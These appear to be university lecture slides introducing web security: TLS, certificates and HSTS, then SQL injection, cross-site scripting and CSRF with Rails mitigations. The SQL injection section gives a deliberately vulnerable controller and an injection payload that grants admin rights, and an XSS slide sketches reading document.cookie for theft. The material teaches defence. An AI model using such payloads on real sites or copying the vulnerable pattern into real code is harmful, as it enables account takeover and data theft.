class: center, middle # An Introduction to Web Security ## CS291A: Scalable Internet Services --- # Today's Agenda * Security Motivation * HTTPS * SQL Injection * Cross-Site Scripting * Cross-Site Request Forgery * Firewalls --- # Security Motivation Internet services increasingly mediate more and more interactions in modern society. * I want to buy dinner. * I want to save important documents. * I want to find a job. * I want to manage my investments. * I want to access my vaccination and medical records . -- Every day billions of people use the same suite of technologies to solve these problems. > How do we keep these interactions secure? --- # Malice Online > What sort of _bad actors_ can exist in this system? .center[![Browser to Client](no_malicious_users.png)] --- # Malicious Client A malicious client may be a compromised host (browser, server, operating system), or a direct attacker. .center[![Malicious Client](malicious_client.png)] --- # Malicious Server A malicious server may be impersonating a real server (therealgoogle.com) in attempt to phish unsuspecting users, or it could be a compromised high-traffic web service serving up drive-by-downloads. .center[![Malicious Server](malicious_server.png)] --- # Malicious Observer A malicious observer may be your neighbor or even your government (NSA) that is recording your actions for nefarious purposes such as obtaining sensitive information (credentials, bank account numbers, credit cards), blackmail (ransom ware). .center[![Malicious Observer](malicious_observer.png)] --- # Malicious Intermediary A malicious intermediary is similar to a malicious observer, but requires more than passive collection of web traffic. Intermediaries may perform a man-in-the-middle attack, DNS poisoning, or a handful of other types of attacks. .center[![Malicious Intermediary](malicious_intermediary.png)] --- # Online Security Goals > What do we want? ## Privacy My data cannot be read by third parties, both now, and in the future. -- ## Authenticity I am communicating with whom I expect to be communicating with. -- ## Integrity Neither my messages, nor the other party's messages have been tampered with. --- # HTTPS HTTP over TCP with a _trusted_ TLS session (HTTPS) is designed to protect us against malicious __servers__, __observers__, and __intermediaries__. ![Malicious Users](malicious_intermediary.png) --- # Problems with TCP Just using TCP as our transport-level protocol gives us little-to-no protection. Anyone on the path of the TCP stream (routers, switches, other clients on a wireless network) can: * Read the packets (violates privacy) * Inject _fake_ packets to disrupt the stream or impersonate the destination server (violates authenticity) * Inject modified packets to change their meaning (violates integrity) --- class: center inverse middle # Solution to our Goals: Cryptography --- # Cryptography in a Nutshell ## Symmetric Cryptography (fast) Uses a single key to encrypt and decrypt data. ```python encrypt(data, key) = encrypted decrypt(encrypted, key) = data ``` * Common Implementations: __AES__, __ChaCha20__, __RC4__, __3DES__ -- ## Asymmetric Cryptography (slow in practice) Uses a pair of keys, one public (pub_key), and one private (priv_key). Either key can be used to encrypt data, and the other used to decrypt. ```python # Only those with the private key can decrypt encrypt(data, pub_key) = encrypted decrypt(encrypted, priv_key) = data # Only those with the private key can encryprt encrypt(data, priv_key) = encrypted decrypt(encrypted, pub_key) = data ``` * Common Implementations used for encryption: __RSA__ * Common Implementations used for key exchange: __RSA__, __Diffie-Hellman__ * Common Implementations used for signatures: __RSA__, __DSA__ --- # Symmetric Cryptography and Requests ![HTTP with Symmetric Cryptography](http_with_crypto.png) > How far can symmetric cryptography alone get us? -- Knowing that an intermediary doesn't have the key -- ._[ - We know requests and responses will be unreadable. __Privacy__ ] -- ._[ - We know they can not encrypt, change, decrypt and then send to the client the data we encrypted on the server. __Integrity__] -- ._[ - We generally have some level of guarantee that we are actually communicating with whom we intend to be. __Authenticity__] --- # Supporting Authenticity on the Web It is desirable for the web to work with combinations of arbitrary clients and servers. As a result we cannot rely upon shared secrets for communication between our browser and whatever server we want to talk to. > How do we establish a shared symmetric key without intermediaries knowing it? --- # Asymmetric Cryptography on the Web Use asymmetric cryptography to communicate a shared secret key. ![HTTP Shared Secret](http_shared_secret.png) > Does this solve all of our malicious actor problems? --- # Man in the Middle Attack Malicious intermediary can: * Create their own asymmetric key pair -- * Present their public key to the server as the client's public key -- * Establish a shared key with the server -- * Present their public key to the client as the server's public key -- * Establish a shared key with the client -- * Relay messages between the client and server, modifying them as desired --- class: center inverse middle # How can we prevent a man in the middle attack? --- # Preventing Man in the Middle Attack If one side knew in advance the public key of the other side, the man in the middle attack wouldn't work. __The attacker is unable to decrypt one of the messages containing half of the secret key.__ -- > Can the server know in advance the public key belonging to a client (e.g., > browser)? -- > Can the the client know in advance the public key belonging to a server? -- > How? --- # Establishing Trust There are significantly more clients than web servers so it makes sense to focus on advanced knowledge of server public keys. > Where can we store the public keys? -- * The server? * DNS? * Trusted Central Authority? All of these have the same problem. -- > How can we trust that the transmission of the desired server's public key has > not been tampered with? --- # A Web of Trust We can use public key signatures to transitively authenticate someone. -- * Alice trusts Bob and as a result already has Bob's public key. -- * Bob trusts Chelsea and has even _signed_ Chelsea's public key. -- * Alice doesn't know Chelsea but wants to talk to her. -- * Alice asks Chelsea for her public key. -- * Chelsea presents her public key along with the signature from Bob. -- * Alice verifies that Chelsea's key has indeed been signed with Bob's key, someone she trusts, and as a result accepts that she is really talking to Chelsea. The public key along with its parent signatures is known as a __certificate__. --- # Certificate Authorities (CAs) Every browser (and operating system) maintains a small list of trusted Certificate Authorities. Any website presenting a certificate issued (signed) by a CA the browser trusts will transitively receive trust from the browser. Certificates can be chained (Root CA -> Intermediate CA* -> Site Certificate) ![TLS Certificate Chain](certificate_chain.png) --- # Trust Summary * __Certificates__ are used to verify the _authenticity_ of the sever. -- * __Asymmetric cryptography__ is used to establish a shared key. -- * __Symmetric cryptography__ is used to quickly and _privately_ communicate with _integrity_. -- The TLS layer added on-top of a TCP session provides all this functionality with different combinations of cipher suites. --- # TLS Handshake .left-column40[ After TCP setup: 1. (unencrypted) Client initiates TLS handshake with a list of supported cipher suites and a random number 2. (unencrypted) Server responds with its cert, selected cipher suite, and a random number 3. (encrypted) Client responds with more randomness 4. Each side independently computes the session key based on the three random numbers 5. Both sides use the symmetric session key to communicate ] .right-column60[ ![TLS Handshake](tls_handshake.png) ] --- # Minimizing Round Trips .left-column40[ The latency involved in the two extra round trips is expensive! An optimization exists for access from a client to a previously accessed server. ] .right-column60[ ![TLS Handshake](tls_handshake.png) ] --- # Abbreviated TLS Handshake .left-column40[ After TCP setup: 1. Session ID is added to connections with new hosts 2. Client initiates TLS handshake with previously-used session ID 3. Server acknowledges previously used session ID 4. Each side computes session key based on remembered random numbers 5. Both sides use the symmetric session key to communicate ] .right-column60[ ![Abbreviated TLS Handshake](abbreviated_tls_handshake.png) ] --- # TLS Goals > Have we achieved our goals? ## Privacy No other party can know __all__ three random numbers with which we generated the session key, thus intermediaries cannot read our data. -- ## Integrity Each TLS frame includes a Message Authentication Code (MAC) that ensures messages were not tampered with. -- ## Authentication The server's public key is signed (certificate) by a trusted CA that the browser already knows about, thus communication occurs with the intended party. --- class: center inverse middle # What happens if a server's private key is compromised or an intermediate CA becomes untrustworthy? --- # TLS Certificate Revocation Certificates can be revoked in two primary ways: * Certificate Revocation List * Periodically fetch a list of all revoked certificates. * At request time, reject revoked server certificates. -- * Online Certificate Status Protocol (OCSP) * At request time, use OCSP to see if the server's certificate has been revoked. If so reject it. -- > What are the trade-offs of the two approaches? --- ## Where should TLS connections terminate? .center[ ### At the Application Server ] ![App Server TLS Termination](tls_termination_app_server.png) .center[ ### At the Load Balancer ] ![Load Balancer TLS Termination](tls_termination_load_balancer.png) --- # TLS Termination Options ## Advantages of termination at the Load Balancer * Minimizing the number of TLS session caches improves hit rate of the abbreviated TLS handshake * Enables the load balancer to make decisions based on content * Single location for private key -- ## Advantages of termination at the App Server * Data between load balancer and app server stays private (do you trust the network between the load balancer and your application servers?) --- # Requiring HTTPS HTTP over TCP+TLS (HTTPS) gives us very good security for the web. However, users aren't always aware it is an option, or may be _coerced_ into using just HTTP. > How can we enforce that browsers access our site using only HTTPS? -- Strict Transport Security gives us the option to inform the browser to use HTTPS for all future communication on the domain. __HTTP Response Header__: ```http Strict-Transport-Security: max-age=31536000 ``` Informs the browser to only use HTTPS to access the domain for the next year. --- # Common Web Vulnerabilities Now we will look at three common security vulnerabilities on the web and how to mitigate them: ## SQL Injection ## Cross-site Scripting ## Cross-site Request Forgery --- # SQL Injection An SQL injection attack is when a malicious user submits a carefully crafted HTTP request that directly or indirectly causes your application server to interact with the database in a manner you did not intend. --- # SQL Injection Example > How could we manipulate the following controller? ```ruby def create sql = <<-SQL INSERT INTO comments user_id=#{params['user_id']}, comment='#{params['comment_text']}'; SQL ActiveRecord::Base.connection.execute(sql) end ``` -- > What if a user submitted the following parameters? ``` user_id=5 comment_text='; UPDATE users SET admin=1 WHERE user_id=5 and '1'='1 ``` --- # SQL Injection Example What was templated as: ```sql INSERT INTO comments user_id=#{user_id}, comment='#{comment_text}'; ``` will become: ```sql INSERT INTO comments user_id=5, comment=''; UPDATE users SET admin=1 WHERE user_id=5 and '1'='1'; ``` --- # Mitigating SQL Injection Vulnerabilities Never insert user input directly into an SQL statement without sanitizing it first. Rails does a lot of the work here for you: * Access through the ActiveRecord ORM is safe * If you need to sanitize custom SQL, use the `sanitize` method: ```ruby "SELECT * FROM comments WHERE id=#{Comment.sanitize(params[:id])};" ``` --- # XKCD: Exploits of a Mom ![XKCD Little Bobby Tables](xkcd_327.png) (C) Randall Munroe: [http://xkcd.com/327/](http://xkcd.com/327/) --- # Cross-site Scripting (XSS) __JavaScript is powerful.__ If an attacker can get a user to execute arbitrary JavaScript on a target site, it can issue arbitrary AJAX HTTP requests to that site and GET requests to other sites. AJAX requests are restricted by browsers' same origin policy, but any requests to the same domain will include all relevant cookies. However, JavaScript can still be used to read cookies and send secrets to other domains via GET requests. ```javascript var cookie = document.cookie; var element = $('.class_selector'); element.innerHTML += '
'; ``` --- # XSS Basics One user submits data that will be displayed to other users of the web application (e.g., add a comment to a submission). When another user visits the page, the server includes this data as part of the body of the webpage. When the victim's browser encounters the data, it executes it in the same way it executes all JavaScript that is embedded within the HTML document. --- # XSS Example ![XSS Example](xss_example.png) > How can we prevent XSS from occurring? --- # XSS Prevention Never trust data from your users. As with SQL Injection, let's sanitize data being displayed. Rails already does this for you: Entering `` into a form as a submission title, and rendering via `<%= submission.title %>` will produce: ```html <script>alert("oops");</script> ``` __Note__: XSS can also be prevented by disabling inline JavaScript with a Content Security Policy by trading convenience for security. --- # SQL Injection and XSS Prevention > How do we make sure we aren't making these sort of mistakes in our web > application? One method is by __fuzzing__. Fuzzing is the process of automatically submitting semi-random input to an application and watching for subsequent problematic side-effects. --- # Cross-site Request Forgery (CSRF) ## Ingredients for this attack: * One malicious server * One target web site * One unsuspecting user of the target web site who happens to visit the malicious server __Note__: The user may access the malicious server by ways of a plugin to the target website. --- # CSRF Explained While AJAX requests cannot cross domains, the same origin policy does not apply to image tags (as we've seen), nor to form elements. Thus a malicious site can trick a user into making a POST request to a target site using that site's cookies. CSRF could be used to: * Automatically post a tweet * Add a Facebook friend * Change a password The possibilities are endless. --- # Mitigating CSRF ## Ensure that GET requests have no side effects. This step ensures any CSRF via image tag, or other resource auto-loading tag is benign. -- ## Add a CSRF Protection Token to every request with side effects Generally every action with side effects originates with the preceding page load. On those pages insert a hidden CSRF protection token into the form. Side-effect requests submitted without a valid token are rejected. --- # CSRF Protection in Rails ```ruby class ApplicationController < ActionController::Base # Prevent CSRF attacks by raising an exception. protect_from_forgery with: :exception end ``` The above results in the following being added to all forms (with different values of course): ```html
``` --- # Common Web Vulnerabilities - Summary Now we will look at three common security vulnerabilities on the web and how to mitigate them: ## SQL Injection Attacker can execute arbitrary SQL on the database ## Cross-site Scripting Attacker can execute arbitrary JavaScript on a user's browser ## Cross-site Request Forgery Attacker can trick user into performing an action on a targeted site